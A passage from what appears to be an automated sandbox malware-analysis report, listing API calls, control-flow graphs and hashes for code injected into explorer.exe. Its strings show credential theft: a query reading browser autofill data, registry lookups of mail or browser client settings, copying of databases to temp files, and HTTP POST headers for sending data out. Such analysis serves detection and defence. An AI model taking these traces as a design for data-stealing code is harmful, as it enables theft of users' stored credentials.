                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocateProcess
                                                        • String ID:
                                                        • API String ID: 1357844191-0
                                                        • Opcode ID: f72606e3c0e245de1ac5a4330d0ddf5cb12277e236aa42a92db5c9bf23566a34
                                                        • Instruction ID: e0211589613c60c02250040143a06265190b4a18b4b9426254d9e333ec9573f1
                                                        • Opcode Fuzzy Hash: f72606e3c0e245de1ac5a4330d0ddf5cb12277e236aa42a92db5c9bf23566a34
                                                        • Instruction Fuzzy Hash: 93A002755511047BDD4857A49F0DA5A3528F7C4702F108544714586451DAA55444C721
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(001220A4,00000001,00000000,0000000A,00113127,000C28DA,00000000,?), ref: 000CBFFC
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 2bdd03f9feea4e02901fdc3fc3d187381d3a9339238f7048150a26f38f3ba999
                                                        • Instruction ID: 133605fa1fdf14a26a9ee541db0d16855689646c758a655b25552749d386d937
                                                        • Opcode Fuzzy Hash: 2bdd03f9feea4e02901fdc3fc3d187381d3a9339238f7048150a26f38f3ba999
                                                        • Instruction Fuzzy Hash: 53E0E53178475076E63077B87C47F9E25855BE0B10F704A6DFA10A91CBDFA781A11026
                                                        APIs
                                                          • Part of subcall function 000C1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                          • Part of subcall function 000C1B6A: CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 000C3C6A
                                                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 000C3C76
                                                        • DeleteFileW.KERNEL32(00000000), ref: 000C3C7D
                                                        • CopyFileW.KERNEL32(?,00000000,00000000), ref: 000C3C89
                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 000C3D2F
                                                        • lstrlen.KERNEL32(00000000), ref: 000C3D36
                                                        • wsprintfA.USER32 ref: 000C3D55
                                                        • lstrlen.KERNEL32(00000000), ref: 000C3D61
                                                        • lstrcat.KERNEL32(00000000,?), ref: 000C3D89
                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 000C3DB2
                                                        • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 000C3DED
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                        • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                        • API String ID: 2923052733-3488123210
                                                        • Opcode ID: 9fe7b3af864eb22a5069aa5cb1d3fec9ace8dfd2889d23c556998eae091e8bc9
                                                        • Instruction ID: c2bcd80db5c543a617e39dcba95eaf11e028253eaeca6157dfbb761b291e7096
                                                        • Opcode Fuzzy Hash: 9fe7b3af864eb22a5069aa5cb1d3fec9ace8dfd2889d23c556998eae091e8bc9
                                                        • Instruction Fuzzy Hash: 0C418030614341ABD715AB74DC85FBF7AE9AF8A744F00882CF846A7253DB36DD428762
                                                        APIs
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                          • Part of subcall function 000C106C: lstrlen.KERNEL32(003AB176,00000000,00000000,00000000,000C1366,75712B62,003AB176,00000000), ref: 000C1074
                                                          • Part of subcall function 000C106C: MultiByteToWideChar.KERNEL32(00000000,00000000,003AB176,00000001,00000000,00000000), ref: 000C1086
                                                          • Part of subcall function 000C12A3: RtlZeroMemory.NTDLL(?,00000018), ref: 000C12B5
                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 000C13C2
                                                        • wsprintfW.USER32 ref: 000C14B5
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000C1594
                                                        Strings
                                                        • POST, xrefs: 000C1465
                                                        • Content-Type: application/x-www-form-urlencoded, xrefs: 000C14FB
                                                        • Accept: */*Referer: %S, xrefs: 000C14AF
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                        • API String ID: 3833683434-704803497
                                                        • Opcode ID: f75c3f53a8a409527eaab55de5ea5bf56e7f89f3ed84d96b06d9f90bf4f99658
                                                        • Instruction ID: 1a514e9f141677b8d8d38dac0240c6b57a8f42db93c0a9cec2361f5d12bb06ef
                                                        • Opcode Fuzzy Hash: f75c3f53a8a409527eaab55de5ea5bf56e7f89f3ed84d96b06d9f90bf4f99658
                                                        • Instruction Fuzzy Hash: 4D7155B0608341AFD7549F28DC84EAFBBE9EB89344F10492DF955C3252DB71D9448B92
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: memcpy$FileReadmemset
                                                        • String ID: winRead
                                                        • API String ID: 2051157613-2759563040
                                                        • Opcode ID: 69bd8d8050483ac35828ca10b4e696c3b4e703440bfbec3ff2a071d762c3194d
                                                        • Instruction ID: ae3c229cc1cd92f986aedc8d904385eedd01eb6e8154fd3d065f857c3eb1b8d8
                                                        • Opcode Fuzzy Hash: 69bd8d8050483ac35828ca10b4e696c3b4e703440bfbec3ff2a071d762c3194d
                                                        • Instruction Fuzzy Hash: 0B316872709248ABC794DF58CC85E9F77E6EFC9318F845928F88587211D670EC458B93
                                                        APIs
                                                        • StrStrIW.SHLWAPI(?,?), ref: 000C2E4B
                                                        • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 000C2EE4
                                                        • RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 000C2F54
                                                        • RegCloseKey.KERNEL32(?), ref: 000C2F62
                                                          • Part of subcall function 000C19E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A1E
                                                          • Part of subcall function 000C19E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A3C
                                                          • Part of subcall function 000C19E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A75
                                                          • Part of subcall function 000C19E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A98
                                                          • Part of subcall function 000C1BC5: lstrlenW.KERNEL32(00000000,00000000,?,000C2E75,PathToExe,00000000,00000000), ref: 000C1BCC
                                                          • Part of subcall function 000C1BC5: StrStrIW.SHLWAPI(00000000,.exe), ref: 000C1BF0
                                                          • Part of subcall function 000C1BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C), ref: 000C1C05
                                                          • Part of subcall function 000C1BC5: lstrlenW.KERNEL32(00000000,?,000C2E75,PathToExe,00000000,00000000), ref: 000C1C1C
                                                          • Part of subcall function 000C1AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 000C1B16
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                        • String ID: PathToExe
                                                        • API String ID: 1799103994-1982016430
                                                        • Opcode ID: 3b1411a72cbd69e8bd35b9cd1a5aa96c1a9a2e93368d237d97e67d5290b58f5f
                                                        • Instruction ID: 26ee18a0ffe83efa59e30f6cb19543e95d49437544527146fba7fe573bb1303b
                                                        • Opcode Fuzzy Hash: 3b1411a72cbd69e8bd35b9cd1a5aa96c1a9a2e93368d237d97e67d5290b58f5f
                                                        • Instruction Fuzzy Hash: E2318B31604211AF8B19AF218C15EEF7AEAEFC9350F00852CF85997252EE75CD42DBA1
                                                        APIs
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • wsprintfW.USER32 ref: 000C4AA2
                                                        • RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 000C4AC7
                                                        • RegCloseKey.ADVAPI32(?), ref: 000C4AD4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                        • String ID: %s\%08x$Software
                                                        • API String ID: 1800864259-1658101971
                                                        • Opcode ID: 00f92a919fe58cc2fcee024e23b5a8a25c02dcf311696da2a4ef3e62040a607d
                                                        • Instruction ID: d5e9b7e6a79eb13147b6ce8ff60bd94faf68ea9827fa1ea85af36e1d1f0cb5ef
                                                        • Opcode Fuzzy Hash: 00f92a919fe58cc2fcee024e23b5a8a25c02dcf311696da2a4ef3e62040a607d
                                                        • Instruction Fuzzy Hash: 02014271600008BFDB18CF90DC8AEFF77ACEB45344B10006EF900A3102EBB26E80D661
                                                        APIs
                                                        • _alloca_probe.NTDLL ref: 000C431C
                                                        • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 000C4335
                                                        • RegEnumKeyExW.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 000C4363
                                                        • RegCloseKey.ADVAPI32(?), ref: 000C43C8
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                          • Part of subcall function 000C418A: wsprintfW.USER32 ref: 000C4212
                                                          • Part of subcall function 000C1011: GetProcessHeap.KERNEL32(00000000,00000000,?,000C1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2), ref: 000C1020
                                                          • Part of subcall function 000C1011: HeapFree.KERNEL32(00000000), ref: 000C1027
                                                        • RegEnumKeyExW.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 000C43B9
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                                        • String ID:
                                                        • API String ID: 801677237-0
                                                        • Opcode ID: e67c078470a900192e25afb11323ca0b6dbc5fdacec239f00ca5753cfcd10387
                                                        • Instruction ID: 60560412b716ae3b9e27860e48b4edd336cd4f6e1dd72b7b9317e541cc3f2f5f
                                                        • Opcode Fuzzy Hash: e67c078470a900192e25afb11323ca0b6dbc5fdacec239f00ca5753cfcd10387
                                                        • Instruction Fuzzy Hash: 4C1182B1104201BFE7199B10CC45EFF77EDFB88344F00862DF889D2151EB759E889A62

                                                        Control-flow Graph (rendered graph not reproduced; the report's basic-block ranges and edges follow, with executed/not-executed colouring lost)
                                                        control_flow_graph 595 cb87b-cb88a 596 cb88d-cb8e3 memset 595->596 597 cb8e5-cb8f3 call cb64b 596->597 598 cb903 596->598 603 cb8f9-cb901 597->603 604 cbaf3-cbaf9 597->604 599 cb905-cb914 call cb609 598->599 606 cb91a-cb923 call cb828 599->606 607 cbae3 599->607 603->599 612 cb929-cb941 606->612 613 cbad6-cbae1 call c68ec 606->613 609 cbae8-cbaf1 call c68ec 607->609 609->604 615 cb946-cb94d 612->615 616 cb943-cb944 612->616 613->609 618 cb950-cb962 615->618 616->618 620 cb965-cb97c CreateFileW 618->620 621 cb97e-cb983 620->621 622 cb9cb-cb9e4 call ca2aa 620->622 624 cb985-cb9aa call c6614 call cbb9f call c6620 621->624 625 cb9b6-cb9c9 call ca250 621->625 631 cb9e6-cb9fd call c68ec * 2 622->631 632 cba41-cba46 622->632 634 cba48-cba52 632->634 635 cba54-cba6e call c68ec * 2 632->635 634->635 648 cb9ac-cb9b0 624->648 649 cb9b2 624->649 625->620 625->622 646 cb9ff-cba04 631->646 647 cba14-cba3c call ca1c6 call 114db2 631->647 651 cba74 635->651 652 cba70-cba72 635->652 646->647 653 cba06-cba0f 646->653 647->604 648->622 648->649 649->625 655 cba79-cba8a 651->655 652->655 653->596 657 cba8c 655->657 658 cba90-cbaa2 call 1152ae 655->658 657->658 663 cbaa8-cbad4 658->663 664 cbaa4 658->664 663->604 664->663
                                                        APIs
                                                        • memset.NTDLL ref: 000CB8D5
                                                        • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 000CB96F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CreateFilememset
                                                        • String ID: psow$winOpen
                                                        • API String ID: 2416746761-4101858489
                                                        • Opcode ID: 947a24c0b705e832bcb66e80d866ba3e2d40e0e4410ba51a9bc00e7d755de889
                                                        • Instruction ID: b1bc4cd02a3218cecb152b020c0a59bdbdab4f0ce4d5c418b4c02a62c680d3a7
                                                        • Opcode Fuzzy Hash: 947a24c0b705e832bcb66e80d866ba3e2d40e0e4410ba51a9bc00e7d755de889
                                                        • Instruction Fuzzy Hash: 6271A271A04705AFC760DF28C882B5EBBE0FF88724F104A2DF9A497291D775D954CB92

                                                        Control-flow Graph (rendered graph not reproduced; the report's basic-block ranges and edges follow, with executed/not-executed colouring lost)
                                                        control_flow_graph 740 c19e5-c19f5 741 c19fa-c1a26 RegOpenKeyExW 740->741 742 c19f7 740->742 743 c1a28-c1a44 RegQueryValueExW 741->743 744 c1aa2-c1aa7 741->744 742->741 747 c1a94-c1aa0 RegCloseKey 743->747 748 c1a46-c1a4c 743->748 745 c1aa9-c1ab9 call c19e5 744->745 746 c1abb 744->746 750 c1abd-c1ac3 745->750 746->750 747->744 747->746 748->747 751 c1a4e-c1a53 748->751 753 c1a5a-c1a7d call c1000 RegQueryValueExW 751->753 754 c1a55-c1a58 751->754 757 c1a7f-c1a81 753->757 758 c1a8b-c1a92 call c1011 753->758 754->747 754->753 757->747 759 c1a83-c1a89 757->759 758->747 759->747
                                                        APIs
                                                        • RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A1E
                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A3C
                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A75
                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A98
                                                          • Part of subcall function 000C1011: GetProcessHeap.KERNEL32(00000000,00000000,?,000C1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2), ref: 000C1020
                                                          • Part of subcall function 000C1011: HeapFree.KERNEL32(00000000), ref: 000C1027
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: HeapQueryValue$CloseFreeOpenProcess
                                                        • String ID:
                                                        • API String ID: 217796345-0
                                                        • Opcode ID: 9436d70d346cafe1e67ebee69c697f253d39a676a69db6c91e8f54c2c14d1aa1
                                                        • Instruction ID: 4fabfa7a8463360d32696f745825540dc6acb7b390ca864aeb677513e9c86ef9
                                                        • Opcode Fuzzy Hash: 9436d70d346cafe1e67ebee69c697f253d39a676a69db6c91e8f54c2c14d1aa1
                                                        • Instruction Fuzzy Hash: 0C21A37220A341AFE7288B21CD04FBFB7E9EFCA754F144A2DF98592152E621CD409722
                                                        APIs
                                                        • RegOpenKeyW.ADVAPI32(?,?,?), ref: 000C1ED5
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C1F0C
                                                        • RegCloseKey.ADVAPI32(?), ref: 000C1F98
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                          • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                          • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                        • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C1F82
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                                        • String ID:
                                                        • API String ID: 1077800024-0
                                                        • Opcode ID: 2826345298574355285d7029a784bd56e530572d793e1daea05b92344c6963a2
                                                        • Instruction ID: 312801df20b4c6f434773809451dbac0668461fae7b5efeb80e90be44095c6c3
                                                        • Opcode Fuzzy Hash: 2826345298574355285d7029a784bd56e530572d793e1daea05b92344c6963a2
                                                        • Instruction Fuzzy Hash: 75215C71208301BFD7099B21DC49EAFBBEDEF8A344F00892DF89992152DB75CD459B62
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000C1C46
                                                        • GetFileSize.KERNEL32(00000000,00000000,00000000,?,000C3FA8), ref: 000C1C56
                                                        • CloseHandle.KERNEL32(00000000), ref: 000C1C91
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000C1C76
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                        • String ID:
                                                        • API String ID: 2517252058-0
                                                        • Opcode ID: 196ca49efc339e49fbcb80f66674423d1aec03e716a55bf626a369164282273e
                                                        • Instruction ID: 8869eff0aedb4585e5cfe9fd9f846d2800c3cea474541fe7e1c897e5fe57ff3c
                                                        • Opcode Fuzzy Hash: 196ca49efc339e49fbcb80f66674423d1aec03e716a55bf626a369164282273e
                                                        • Instruction Fuzzy Hash: 2FF081312002187BD2241B25DC88FFF7A9CDB477B5F16061DF51592192EB539C458171
                                                        APIs
                                                          • Part of subcall function 000C1011: GetProcessHeap.KERNEL32(00000000,00000000,?,000C1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2), ref: 000C1020
                                                          • Part of subcall function 000C1011: HeapFree.KERNEL32(00000000), ref: 000C1027
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 000C2EE4
                                                        • RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 000C2F54
                                                        • RegCloseKey.KERNEL32(?), ref: 000C2F62
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                                        • String ID:
                                                        • API String ID: 1066184869-0
                                                        • Opcode ID: 7b09e8eb0fed5343c55e24a40b2658fb71e7aa9149e44799a0dc1090d42ace94
                                                        • Instruction ID: 37da3b80879da37bc67d4af4f669a1a9ad8ecdb0f523aff93c9fd86c8ed134e7
                                                        • Opcode Fuzzy Hash: 7b09e8eb0fed5343c55e24a40b2658fb71e7aa9149e44799a0dc1090d42ace94
                                                        • Instruction Fuzzy Hash: 09018631204254ABC7159F21DC05EEF7FA9EFCA390F10442DF85992153DE758985EBA1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: ExitInitializeProcessUninitialize
                                                        • String ID:
                                                        • API String ID: 4175140541-0
                                                        • Opcode ID: 93250f317fa30003a126143051c953bb4adabc391b366acc3b35ba3fc31f24b9
                                                        • Instruction ID: e31af23fe5809eada00f867ee4f4d181e9e93fedf537769018753eb4e94eddb2
                                                        • Opcode Fuzzy Hash: 93250f317fa30003a126143051c953bb4adabc391b366acc3b35ba3fc31f24b9
                                                        • Instruction Fuzzy Hash: 5DC04C302851005BE6842BE05E1DB8D3598BB00712F008004F205854A1DB6244808622
                                                        APIs
                                                        • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 000C9FF8
                                                        Strings
                                                        • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 000CA00E
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: CreateHeap
                                                        • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                                        • API String ID: 10892065-982776804
                                                        • Opcode ID: 1c6f0276cd4ff51f4b56e16dd79262cf8212659a4eaafd5dd586f4daaafb6ded
                                                        • Instruction ID: e715bdd9b239edc05242f7aebd258c497018237035b896384139ad43ec015729
                                                        • Opcode Fuzzy Hash: 1c6f0276cd4ff51f4b56e16dd79262cf8212659a4eaafd5dd586f4daaafb6ded
                                                        • Instruction Fuzzy Hash: 1BF0F672704345BAE7305B94AC8CF6F67DCD795789F20043DF945D3240E2706C428631
                                                        APIs
                                                          • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                          • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 000C1B16
                                                          • Part of subcall function 000C1011: GetProcessHeap.KERNEL32(00000000,00000000,?,000C1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2), ref: 000C1020
                                                          • Part of subcall function 000C1011: HeapFree.KERNEL32(00000000), ref: 000C1027
                                                          • Part of subcall function 000C19E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A1E
                                                          • Part of subcall function 000C19E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A3C
                                                          • Part of subcall function 000C19E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A75
                                                          • Part of subcall function 000C19E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A98
                                                        Strings
                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 000C1B40
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                        • API String ID: 2162223993-2036018995
                                                        • Opcode ID: 44cdefc82f74f0496f1b8048a4099373e33a50e793271cd61b873b5270bde947
                                                        • Instruction ID: ba6ff228695c27fa0e95587fa3488995e2f62e52786e8c68b30e74e3f32379bf
                                                        • Opcode Fuzzy Hash: 44cdefc82f74f0496f1b8048a4099373e33a50e793271cd61b873b5270bde947
                                                        • Instruction Fuzzy Hash: 7CF0B43670064827D615AB2ACC84FEF768ECBD33A6316002DF41993243EF23AC915668
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(02660000,00000000,?), ref: 000C9EB5
                                                        Strings
                                                        • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 000C9ECD
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                        • API String ID: 1279760036-667713680
                                                        • Opcode ID: da7f7630cc1bc5861019b0ae3798b5517accf1ea9870ffd5202e7ebeb74858b4
                                                        • Instruction ID: 75b594978964026cbc1719c2babe4ecb5b8b57bcb69ff72efe4b527b1532c5f2
                                                        • Opcode Fuzzy Hash: da7f7630cc1bc5861019b0ae3798b5517accf1ea9870ffd5202e7ebeb74858b4
                                                        • Instruction Fuzzy Hash: 1AE0CD376041107BC12257446C05F5F7764DBA4F10F010019F90453651C3309C5287A1
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                        • CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.514536871.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
